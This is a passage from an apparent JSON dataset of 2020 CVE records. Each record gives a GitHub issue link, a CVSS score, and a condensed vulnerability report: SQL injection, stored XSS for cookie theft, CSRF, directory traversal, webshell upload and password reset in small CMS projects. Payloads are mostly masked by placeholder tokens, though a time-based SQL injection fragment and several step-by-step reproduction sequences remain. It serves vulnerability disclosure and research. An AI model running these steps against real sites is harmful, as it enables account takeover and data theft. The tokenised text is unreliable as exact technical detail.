  53371. "Repo_new": "szfsir/tmpproject",
  53372. "Issue_Created_At": "2019-11-07T09:01:40Z",
  53373. "description": "Metinfo NUMBERTAG admin background SQL Injection. Vulnerability Name: APITAG CMS SQL Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG After admin APITAG must send different order and mask column below) payload ERRORTAG FILETAG",
  53374. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  53375. "severity": "HIGH",
  53376. "baseScore": 7.2,
  53377. "impactScore": 5.9,
  53378. "exploitabilityScore": 1.2
  53379. },
  53380. {
  53381. "CVE_ID": "CVE-2020-21132",
  53382. "Issue_Url_old": "https://github.com/SZFsir/tmpProject/issues/2",
  53383. "Issue_Url_new": "https://github.com/szfsir/tmpproject/issues/2",
  53384. "Repo_new": "szfsir/tmpproject",
  53385. "Issue_Created_At": "2019-11-07T08:52:22Z",
  53386. "description": "Metinfo NUMBERTAG SQL Injection. Vulnerability Name: APITAG CMS SQL Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG To demonstrate this vuln, follow three steps below. First, Get the key Metinfo disclosure the key by FILETAG FILETAG Then, encrypt the payload Metinfo NUMBERTAG Use encrypt cookie to auth login. We can see it use user input as auth and key to pass it to login_by_auth function FILETAG In login_by_auth function, It use getauth function decode the auth data by the key we input. FILETAG And then in login_by_password pass the username(sql inject payload) and then cause sqli We have the key, and we know the way to encrypt data. As below ERRORTAG FILETAG Finally, send the payload APITAG should encrypt the data first) CODETAG (execute the sql twice) FILETAG",
  53387. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53388. "severity": "CRITICAL",
  53389. "baseScore": 9.8,
  53390. "impactScore": 5.9,
  53391. "exploitabilityScore": 3.9
  53392. },
  53393. {
  53394. "CVE_ID": "CVE-2020-21133",
  53395. "Issue_Url_old": "https://github.com/SZFsir/tmpProject/issues/1",
  53396. "Issue_Url_new": "https://github.com/szfsir/tmpproject/issues/1",
  53397. "Repo_new": "szfsir/tmpproject",
  53398. "Issue_Created_At": "2019-11-07T08:06:40Z",
  53399. "description": "Metinfo NUMBERTAG SQL Injection. Vulnerability Name: APITAG CMS SQL Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG To demonstrate this vuln, follow three steps below. First, Get the key Metinfo disclosure the key by FILETAG FILETAG Then, encrypt the payload Metinfo NUMBERTAG Use encrypt email to check email valid. We can see after decode the data, It pass the email to get_user_by_email function FILETAG Then get_user_by_email function pass it to get_user_by_emailid function FILETAG Finally, It cause sql injection. FILETAG We have the key, and we know the way to encrypt data. As below ERRORTAG FILETAG Finally, send the payload APITAG should encrypt the data first) CODETAG FILETAG",
  53400. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53401. "severity": "CRITICAL",
  53402. "baseScore": 9.8,
  53403. "impactScore": 5.9,
  53404. "exploitabilityScore": 3.9
  53405. },
  53406. {
  53407. "CVE_ID": "CVE-2020-21146",
  53408. "Issue_Url_old": "https://github.com/liufee/cms/issues/43",
  53409. "Issue_Url_new": "https://github.com/liufee/cms/issues/43",
  53410. "Repo_new": "liufee/cms",
  53411. "Issue_Created_At": "2019-11-01T10:27:58Z",
  53412. "description": "XSS vulnerability in feihicms NUMBERTAG This is a Cross Site Scripting vulnerability. When the user name is APITAG alert NUMBERTAG APITAG or js code, the pop up alert will be triggered when browsing the post. Details are as follows: POC example: registered\uff1a CODETAG login\uff1a CODETAG registered\uff1a FILETAG login: FILETAG View post\uff1a FILETAG FILETAG How to fix: URLTAG",
  53413. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53414. "severity": "MEDIUM",
  53415. "baseScore": 6.1,
  53416. "impactScore": 2.7,
  53417. "exploitabilityScore": 2.8
  53418. },
  53419. {
  53420. "CVE_ID": "CVE-2020-21147",
  53421. "Issue_Url_old": "https://github.com/alixiaowei/alixiaowei.github.io/issues/2",
  53422. "Issue_Url_new": "https://github.com/alixiaowei/alixiaowei.github.io/issues/2",
  53423. "Repo_new": "alixiaowei/alixiaowei.github.io",
  53424. "Issue_Created_At": "2019-10-14T13:59:49Z",
  53425. "description": "There is one stored XSS vulnerability that allows JS code execution. Vulnerability path: PATHTAG line NUMBERTAG ERRORTAG Sending an email with no filtering of dangerous characters leads to XSS, which can be used to obtain administrator cookies. Verification: user: wangjing wangjing(user) send email administrator title: APITAG FILETAG poc: ERRORTAG After the administrator logs in, the XSS is triggered FILETAG",
  53426. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  53427. "severity": "MEDIUM",
  53428. "baseScore": 4.8,
  53429. "impactScore": 2.7,
  53430. "exploitabilityScore": 1.7
  53431. },
  53432. {
  53433. "CVE_ID": "CVE-2020-21179",
  53434. "Issue_Url_old": "https://github.com/wclimb/Koa2-blog/issues/40",
  53435. "Issue_Url_new": "https://github.com/wunci/koa2-blog/issues/40",
  53436. "Repo_new": "wunci/koa2-blog",
  53437. "Issue_Created_At": "2019-11-28T07:35:07Z",
  53438. "description": "koa2 blog NUMBERTAG sql injection vulnerability. A sql injection was discovered in WUZHI CMS NUMBERTAG APITAG is a sql injection vulnerability which allows remote attackers to inject a malicious SQL statement into the server via: APITAG Vulnerability code APITAG POC Trigger SQL injection vulnerability by registering new users FILETAG",
  53439. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53440. "severity": "CRITICAL",
  53441. "baseScore": 9.8,
  53442. "impactScore": 5.9,
  53443. "exploitabilityScore": 3.9
  53444. },
  53445. {
  53446. "CVE_ID": "CVE-2020-21180",
  53447. "Issue_Url_old": "https://github.com/wclimb/Koa2-blog/issues/41",
  53448. "Issue_Url_new": "https://github.com/wunci/koa2-blog/issues/41",
  53449. "Repo_new": "wunci/koa2-blog",
  53450. "Issue_Created_At": "2019-11-28T07:53:03Z",
  53451. "description": "koa2 blog NUMBERTAG sql injection vulnerability. A sql injection was discovered in koa2 blog NUMBERTAG APITAG is a sql injection vulnerability which allows remote attackers to inject a malicious SQL statement into the server via: APITAG Vulnerability code ERRORTAG POC Trigger SQL injection vulnerability by registering new users; we can see that the injected statement executed successfully and the page response timed out for NUMBERTAG S FILETAG FILETAG",
  53452. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53453. "severity": "CRITICAL",
  53454. "baseScore": 9.8,
  53455. "impactScore": 5.9,
  53456. "exploitabilityScore": 3.9
  53457. },
  53458. {
  53459. "CVE_ID": "CVE-2020-21228",
  53460. "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/16",
  53461. "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/16",
  53462. "Repo_new": "cherry-toto/jizhicms",
  53463. "Issue_Created_At": "2020-03-16T03:08:27Z",
  53464. "description": "XSS Stealing cookies. JIZHICMS NUMBERTAG allows XSS to add an administrator cookie. New normal account => New articles FILETAG code: APITAG FILETAG Click on the title to trigger XSS FILETAG",
  53465. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53466. "severity": "MEDIUM",
  53467. "baseScore": 6.1,
  53468. "impactScore": 2.7,
  53469. "exploitabilityScore": 2.8
  53470. },
  53471. {
  53472. "CVE_ID": "CVE-2020-21238",
  53473. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/5",
  53474. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/5",
  53475. "Repo_new": "chshcms/cscms",
  53476. "Issue_Created_At": "2019-11-15T01:15:46Z",
  53477. "description": "cscms demourl: FILETAG login have APITAG Vulnerability. APITAG NUMBERTAG demourl: FILETAG In the user login box Sign in now without a verification code and prompt that the user does not exist\uff0cwhich makes it easier for remote attackers to hijack accounts via a brute force approach. Capture the packet in burp to truncate the current request the current data packet sent to the intruder module, identification \"username\" used to traverse account information; Select the dictionary for the account name to open the attack FILETAG Successful login account FILETAG This is a prompt password error FILETAG This is the prompt that the account does not exist. FILETAG",
  53478. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53479. "severity": "CRITICAL",
  53480. "baseScore": 9.8,
  53481. "impactScore": 5.9,
  53482. "exploitabilityScore": 3.9
  53483. },
  53484. {
  53485. "CVE_ID": "CVE-2020-21244",
  53486. "Issue_Url_old": "https://github.com/FrontAccountingERP/FA/issues/40",
  53487. "Issue_Url_new": "https://github.com/frontaccountingerp/fa/issues/40",
  53488. "Repo_new": "frontaccountingerp/fa",
  53489. "Issue_Created_At": "2019-11-12T03:59:14Z",
  53490. "description": "a Directory Traversal vulnerability. test version NUMBERTAG description Frontaccounting is using the function APITAG to eliminate '../' in the file name submitted by the user to avoid directory traversal vulnerability. FILETAG However, some variables do not use the function APITAG in FILETAG , which can cause attackers to submit a language package whose language code contains '../'. After adding it successfully, by deleting it, the attacker can empty a specified folder, as in the examples. APITAG FILETAG APITAG FILETAG NUMBERTAG Example: empty admin folder NUMBERTAG Before clearing the admin folder FILETAG NUMBERTAG The administrator logs in and creates a new language pack FILETAG FILETAG NUMBERTAG Set the language code to ../admin and save it FILETAG NUMBERTAG Delete the language pack you just created FILETAG NUMBERTAG After deleting successfully, the admin folder will be emptied FILETAG",
  53491. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  53492. "severity": "MEDIUM",
  53493. "baseScore": 4.9,
  53494. "impactScore": 3.6,
  53495. "exploitabilityScore": 1.2
  53496. },
  53497. {
  53498. "CVE_ID": "CVE-2020-21250",
  53499. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/22",
  53500. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/22",
  53501. "Repo_new": "cskaza/cszcms",
  53502. "Issue_Created_At": "2019-11-14T06:26:14Z",
  53503. "description": "Time based blind SQL injection Vulnerability in CSZCMS NUMBERTAG Hi, MENTIONTAG and I found an arbitrary file upload vulnerability in cszcms NUMBERTAG The vulnerable code is on PATHTAG file line NUMBERTAG FILETAG I think using the function \u2018escape string\u2019 can solve the sql injection vulnerability,but you use function 'xss_clean' after APITAG function 'xss_clean' can decode str with function 'rawurldecode',so I can exploit like NUMBERTAG Urlencode the value of UA: Before: User Agent: ' ( if NUMBERTAG sleep NUMBERTAG APITAG After: User Agent: APITAG FILETAG Suggest: Remove function 'xss_clean' here.",
  53504. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53505. "severity": "CRITICAL",
  53506. "baseScore": 9.8,
  53507. "impactScore": 5.9,
  53508. "exploitabilityScore": 3.9
  53509. },
  53510. {
  53511. "CVE_ID": "CVE-2020-21316",
  53512. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/56",
  53513. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/56",
  53514. "Repo_new": "94fzb/zrlog",
  53515. "Issue_Created_At": "2019-10-20T12:20:37Z",
  53516. "description": "\u524d\u53f0\u6587\u7ae0\u8bc4\u8bba\u5904\u5b58\u50a8\u578bXSS. APITAG FILETAG FILETAG",
  53517. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53518. "severity": "MEDIUM",
  53519. "baseScore": 6.1,
  53520. "impactScore": 2.7,
  53521. "exploitabilityScore": 2.8
  53522. },
  53523. {
  53524. "CVE_ID": "CVE-2020-21321",
  53525. "Issue_Url_old": "https://github.com/emlog/emlog/issues/50",
  53526. "Issue_Url_new": "https://github.com/emlog/emlog/issues/50",
  53527. "Repo_new": "emlog/emlog",
  53528. "Issue_Created_At": "2019-10-22T07:54:16Z",
  53529. "description": "Using CSRF to construct arbitrary links. url\uff1a URLTAG poc \uff1a APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG describe\uff1a Under this link, you can add any link to the website. If someone accidentally clicks on the link, they will jump to the link, find a URL where XSS exists, and you can directly hit a cookie, or blackproduce can construct a black chain. FILETAG FILETAG FILETAG",
  53530. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  53531. "severity": "MEDIUM",
  53532. "baseScore": 4.3,
  53533. "impactScore": 1.4,
  53534. "exploitabilityScore": 2.8
  53535. },
  53536. {
  53537. "CVE_ID": "CVE-2020-21322",
  53538. "Issue_Url_old": "https://github.com/liufee/cms/issues/44",
  53539. "Issue_Url_new": "https://github.com/liufee/cms/issues/44",
  53540. "Repo_new": "liufee/cms",
  53541. "Issue_Created_At": "2019-11-06T05:26:30Z",
  53542. "description": "File upload command execution. In the background, you can upload the PHP file by changing the image suffix to PHP, resulting in command execution. url\uff1a URLTAG FILETAG FILETAG FILETAG",
  53543. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53544. "severity": "CRITICAL",
  53545. "baseScore": 9.8,
  53546. "impactScore": 5.9,
  53547. "exploitabilityScore": 3.9
  53548. },
  53549. {
  53550. "CVE_ID": "CVE-2020-21333",
  53551. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/27",
  53552. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/27",
  53553. "Repo_new": "sanluan/publiccms",
  53554. "Issue_Created_At": "2019-11-19T11:31:53Z",
  53555. "description": "Background storage XSS. Background storage XSS step1\uff1a FILETAG Submit case FILETAG step2\uff1a Administrator review submit case trigger xss FILETAG Click to trigger xss FILETAG",
  53556. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  53557. "severity": "MEDIUM",
  53558. "baseScore": 5.4,
  53559. "impactScore": 2.7,
  53560. "exploitabilityScore": 2.3
  53561. },
  53562. {
  53563. "CVE_ID": "CVE-2020-21342",
  53564. "Issue_Url_old": "https://github.com/Ksharp12138/zzcms/issues/1",
  53565. "Issue_Url_new": "https://github.com/l7o-0/zzcms_vulnerability/issues/1",
  53566. "Repo_new": "l7o-0/zzcms_vulnerability",
  53567. "Issue_Created_At": "2019-11-20T03:46:34Z",
  53568. "description": "Reset any user password. link: FILETAG FILETAG Edition: zzcms NUMBERTAG data NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG The password is found by controlling action and username NUMBERTAG Control action and password We can see first ==> set action NUMBERTAG second ==> set password,passwordtrue field so set json ==> APITAG NUMBERTAG payload Payload is as follows, add post: APITAG An attacker can query registered users through the registration interface Reset the user password without authentication FILETAG NUMBERTAG Exp it There is zzcms register user FILETAG Crawl registration request FILETAG add payload in post request FILETAG FILETAG FILETAG Confirm that the user password in the database has been changed FILETAG FILETAG You can use this password to log in to the user's personal center FILETAG But in my tests, I found that if you create a new user you have to wait a while or restart your database; the same should happen if you change a user's password",
  53569. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  53570. "severity": "HIGH",
  53571. "baseScore": 7.5,
  53572. "impactScore": 3.6,
  53573. "exploitabilityScore": 3.9
  53574. },
  53575. {
  53576. "CVE_ID": "CVE-2020-21345",
  53577. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/336",
  53578. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/336",
  53579. "Repo_new": "halo-dev/halo",
  53580. "Issue_Created_At": "2019-10-15T13:56:16Z",
  53581. "description": "\u540e\u53f0\u6dfb\u52a0\u6587\u7ae0XSS\uff0c\u4e0a\u4f20\u5934\u50cf\u5904\u53ef\u4ee5\u4e0a\u4f20\u4efb\u610f\u6587\u4ef6. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) x] APITAG \u4f7f\u7528\u6587\u6863 URLTAG FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG FILETAG PATHTAG FILETAG FILETAG",
  53582. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53583. "severity": "MEDIUM",
  53584. "baseScore": 6.1,
  53585. "impactScore": 2.7,
  53586. "exploitabilityScore": 2.8
  53587. },
  53588. {
  53589. "CVE_ID": "CVE-2020-21353",
  53590. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1319",
  53591. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1319",
  53592. "Repo_new": "getsimplecms/getsimplecms",
  53593. "Issue_Created_At": "2019-11-20T07:09:52Z",
  53594. "description": "Storage XSS in FILETAG . APITAG Payload: '\"> APITAG At Snippets, click on ADD SNIPPEN and edit Snippets to XSS. FILETAG Click Save Snippets to save and refresh the starting XSS FILETAG",
  53595. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  53596. "severity": "MEDIUM",
  53597. "baseScore": 5.4,
  53598. "impactScore": 2.7,
  53599. "exploitabilityScore": 2.3
  53600. },
  53601. {
  53602. "CVE_ID": "CVE-2020-21356",
  53603. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/23",
  53604. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/23",
  53605. "Repo_new": "popojicms/popojicms",
  53606. "Issue_Created_At": "2019-11-22T02:49:52Z",
  53607. "description": "Host path leak in FILETAG . version NUMBERTAG poc:delete name=\"file\"; Normal upload file FILETAG Deleting \"name =\" file \";\" will cause host physical path disclosure FILETAG",
  53608. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  53609. "severity": "MEDIUM",
  53610. "baseScore": 5.3,
  53611. "impactScore": 1.4,
  53612. "exploitabilityScore": 3.9
  53613. },
  53614. {
  53615. "CVE_ID": "CVE-2020-21357",
  53616. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/24",
  53617. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/24",
  53618. "Repo_new": "popojicms/popojicms",
  53619. "Issue_Created_At": "2019-11-22T06:05:31Z",
  53620. "description": "Stored XSS in Tambah Pengguna (Add User). version NUMBERTAG APITAG APITAG EMAILTAG The email address is set to an XSS payload when a new user is added. FILETAG After adding the user, click Edit to view the user's information in Pengguna (Users): FILETAG the stored XSS is triggered. FILETAG",
  53621. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53622. "severity": "MEDIUM",
  53623. "baseScore": 6.1,
  53624. "impactScore": 2.7,
  53625. "exploitabilityScore": 2.8
  53626. },
  53627. {
  53628. "CVE_ID": "CVE-2020-21358",
  53629. "Issue_Url_old": "https://github.com/WXiangQian/wage-cms/issues/1",
  53630. "Issue_Url_new": "https://github.com/wxiangqian/wage-cms/issues/1",
  53631. "Repo_new": "wxiangqian/wage-cms",
  53632. "Issue_Created_At": "2019-11-25T09:33:40Z",
  53633. "description": "CSRF in /admin/users. Version NUMBERTAG dev. The employee-management form under /admin/users has no CSRF protection. State before the attack: FILETAG Click APITAG and edit employee information FILETAG Capture the request and build a CSRF payload page from it, saved as FILETAG FILETAG When a logged-in administrator visits FILETAG and clicks 'submit request' FILETAG a new employee record is added. FILETAG",
  53634. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  53635. "severity": "MEDIUM",
  53636. "baseScore": 6.5,
  53637. "impactScore": 3.6,
  53638. "exploitabilityScore": 2.8
  53639. },
  53640. {
  53641. "CVE_ID": "CVE-2020-21359",
  53642. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/80",
  53643. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/80",
  53644. "Repo_new": "magicblack/maccms10",
  53645. "Issue_Created_At": "2019-10-22T13:56:49Z",
  53646. "description": "Remote command execution (arbitrary file write) in the management backend. On the \"\"\u8d85\u7ea7\u63a7\u5236\u53f0 >\u6a21\u677f >\u6a21\u677f\u7ba1\u7406\"\" (Super Console > Templates > Template Management) page, the Add function bypasses the file-suffix whitelist check, so a backend user can create a file with any extension. Like this. FILETAG Then click Save. FILETAG The file FILETAG is created with the attacker-supplied malicious content. Then request FILETAG to reach the webshell. FILETAG",
  53647. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53648. "severity": "CRITICAL",
  53649. "baseScore": 9.8,
  53650. "impactScore": 5.9,
  53651. "exploitabilityScore": 3.9
  53652. },
  53653. {
  53654. "CVE_ID": "CVE-2020-21362",
  53655. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/78",
  53656. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/78",
  53657. "Repo_new": "magicblack/maccms10",
  53658. "Issue_Created_At": "2019-10-22T12:56:42Z",
  53659. "description": "XSS in the backend search function, triggered via a crafted link. While the administrator is logged in, open the following link: APITAG FILETAG The payload can read the administrator's cookie value, which allows the administrator account to be taken over.",
  53660. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  53661. "severity": "MEDIUM",
  53662. "baseScore": 5.4,
  53663. "impactScore": 2.7,
  53664. "exploitabilityScore": 2.3
  53665. },
  53666. {
  53667. "CVE_ID": "CVE-2020-21363",
  53668. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/79",
  53669. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/79",
  53670. "Repo_new": "magicblack/maccms10",
  53671. "Issue_Created_At": "2019-10-22T13:17:51Z",
  53672. "description": "Arbitrary file deletion in the backend. On the \"\"\u8d85\u7ea7\u63a7\u5236\u53f0 >\u57fa\u7840 >\u9644\u4ef6\u7ba1\u7406\"\" (Super Console > Basic > Attachment Management) page, the delete function can delete any file, including APITAG. While the administrator is logged in, open the following link: APITAG The file APITAG is deleted. Then visit APITAG which allows the entire site to be reinstalled. FILETAG delete APITAG APITAG",
  53673. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
  53674. "severity": "MEDIUM",
  53675. "baseScore": 6.5,
  53676. "impactScore": 5.2,
  53677. "exploitabilityScore": 1.2
  53678. },
  53679. {
  53680. "CVE_ID": "CVE-2020-21386",
  53681. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/126",
  53682. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/126",
  53683. "Repo_new": "magicblack/maccms10",
  53684. "Issue_Created_At": "2019-11-25T09:32:04Z",
  53685. "description": "CSRF combined with stored XSS via PATHTAG that can yield administrator privileges. While the administrator is logged in, open the following page, which adds a classification (category): APITAG Insert the payload in the \u201ctype_en\u201d field: CODETAG The \u201cenglish name\u201d is then set to \" APITAG \". Result: FILETAG An attacker can use this to obtain the administrator's cookie and thereby gain administrator privileges.",
  53686. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  53687. "severity": "HIGH",
  53688. "baseScore": 8.8,
  53689. "impactScore": 5.9,
  53690. "exploitabilityScore": 2.8
  53691. },
  53692. {
  53693. "CVE_ID": "CVE-2020-21431",
  53694. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/14",
  53695. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/14",
  53696. "Repo_new": "neeke/hongcms",
  53697. "Issue_Created_At": "2019-11-28T08:35:27Z",
  53698. "description": "APITAG NUMBERTAG Arbitrary file read and edit in template/edit (administrator privilege required). Log in to the backend as the administrator; then access the page \" URLTAG \" FILETAG Put the name of the file you want to read or edit in the URL and request this page. For example: \" FILETAG \". FILETAG You can see that FILETAG has been read and edited.",
  53699. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
  53700. "severity": "MEDIUM",
  53701. "baseScore": 6.5,
  53702. "impactScore": 5.2,
  53703. "exploitabilityScore": 1.2
  53704. },
  53705. {
  53706. "CVE_ID": "CVE-2020-21468",
  53707. "Issue_Url_old": "https://github.com/antirez/redis/issues/6633",
  53708. "Issue_Url_new": "https://github.com/redis/redis/issues/6633",
  53709. "Repo_new": "redis/redis",
  53710. "Issue_Created_At": "2019-12-01T01:48:53Z",
  53711. "description": "Unexpected crash. === REDIS BUG REPORT START: Cut & paste starting from here NUMBERTAG M NUMBERTAG No NUMBERTAG Redis APITAG crashed by signal NUMBERTAG M NUMBERTAG No NUMBERTAG Crashed running the instruction at NUMBERTAG d4daa NUMBERTAG e NUMBERTAG M NUMBERTAG No NUMBERTAG Accessing address: (nil NUMBERTAG M NUMBERTAG No NUMBERTAG Failed assertion: <no assertion failed> (<no file NUMBERTAG STACK TRACE EIP: PATHTAG APITAG Backtrace: PATHTAG APITAG PATHTAG APITAG PATHTAG NUMBERTAG fc NUMBERTAG e0f NUMBERTAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG INFO OUTPUT Server APITAG redis_git_sha1:a1b NUMBERTAG redis_git_dirty NUMBERTAG APITAG redis_mode:standalone APITAG NUMBERTAG generic NUMBERTAG arch_bits NUMBERTAG multiplexing_api:epoll atomicvar_api:atomic builtin gcc_version NUMBERTAG process_id NUMBERTAG APITAG tcp_port NUMBERTAG uptime_in_seconds NUMBERTAG uptime_in_days NUMBERTAG hz NUMBERTAG configured_hz NUMBERTAG lru_clock NUMBERTAG PATHTAG config_file: Clients connected_clients NUMBERTAG APITAG APITAG blocked_clients NUMBERTAG tracking_clients NUMBERTAG Memory used_memory NUMBERTAG used_memory_human NUMBERTAG K used_memory_rss NUMBERTAG used_memory_rss_human NUMBERTAG M used_memory_peak NUMBERTAG APITAG used_memory_peak_perc NUMBERTAG used_memory_overhead NUMBERTAG used_memory_startup NUMBERTAG APITAG APITAG allocator_allocated NUMBERTAG allocator_active NUMBERTAG allocator_resident NUMBERTAG APITAG APITAG used_memory_lua NUMBERTAG used_memory_lua_human NUMBERTAG K used_memory_scripts NUMBERTAG used_memory_scripts_human NUMBERTAG B number_of_cached_scripts NUMBERTAG maxmemory NUMBERTAG maxmemory_human NUMBERTAG B maxmemory_policy:noeviction allocator_frag_ratio NUMBERTAG allocator_frag_bytes NUMBERTAG allocator_rss_ratio NUMBERTAG allocator_rss_bytes NUMBERTAG rss_overhead_ratio NUMBERTAG rss_overhead_bytes NUMBERTAG 
mem_fragmentation_ratio NUMBERTAG APITAG mem_not_counted_for_evict NUMBERTAG mem_replication_backlog NUMBERTAG mem_clients_slaves NUMBERTAG mem_clients_normal NUMBERTAG mem_aof_buffer NUMBERTAG mem_allocator:jemalloc NUMBERTAG active_defrag_running NUMBERTAG lazyfree_pending_objects NUMBERTAG Persistence loading NUMBERTAG rdb_changes_since_last_save NUMBERTAG rdb_bgsave_in_progress NUMBERTAG rdb_last_save_time NUMBERTAG rdb_last_bgsave_status:ok rdb_last_bgsave_time_sec NUMBERTAG rdb_current_bgsave_time_sec NUMBERTAG rdb_last_cow_size NUMBERTAG aof_enabled NUMBERTAG aof_rewrite_in_progress NUMBERTAG aof_rewrite_scheduled NUMBERTAG aof_last_rewrite_time_sec NUMBERTAG aof_current_rewrite_time_sec NUMBERTAG aof_last_bgrewrite_status:ok aof_last_write_status:ok aof_last_cow_size NUMBERTAG module_fork_in_progress NUMBERTAG module_fork_last_cow_size NUMBERTAG Stats APITAG total_commands_processed NUMBERTAG instantaneous_ops_per_sec NUMBERTAG total_net_input_bytes NUMBERTAG total_net_output_bytes NUMBERTAG instantaneous_input_kbps NUMBERTAG APITAG rejected_connections NUMBERTAG sync_full NUMBERTAG sync_partial_ok NUMBERTAG sync_partial_err NUMBERTAG expired_keys NUMBERTAG expired_stale_perc NUMBERTAG APITAG APITAG evicted_keys NUMBERTAG keyspace_hits NUMBERTAG keyspace_misses NUMBERTAG pubsub_channels NUMBERTAG pubsub_patterns NUMBERTAG latest_fork_usec NUMBERTAG migrate_cached_sockets NUMBERTAG slave_expires_tracked_keys NUMBERTAG active_defrag_hits NUMBERTAG active_defrag_misses NUMBERTAG active_defrag_key_hits NUMBERTAG active_defrag_key_misses NUMBERTAG tracking_used_slots NUMBERTAG Replication role:master connected_slaves NUMBERTAG APITAG APITAG master_repl_offset NUMBERTAG second_repl_offset NUMBERTAG repl_backlog_active NUMBERTAG repl_backlog_size NUMBERTAG APITAG repl_backlog_histlen NUMBERTAG CPU APITAG APITAG APITAG APITAG Modules Commandstats APITAG Cluster cluster_enabled NUMBERTAG Keyspace APITAG CLIENT LIST OUTPUT REGISTERS NUMBERTAG M NUMBERTAG No NUMBERTAG 
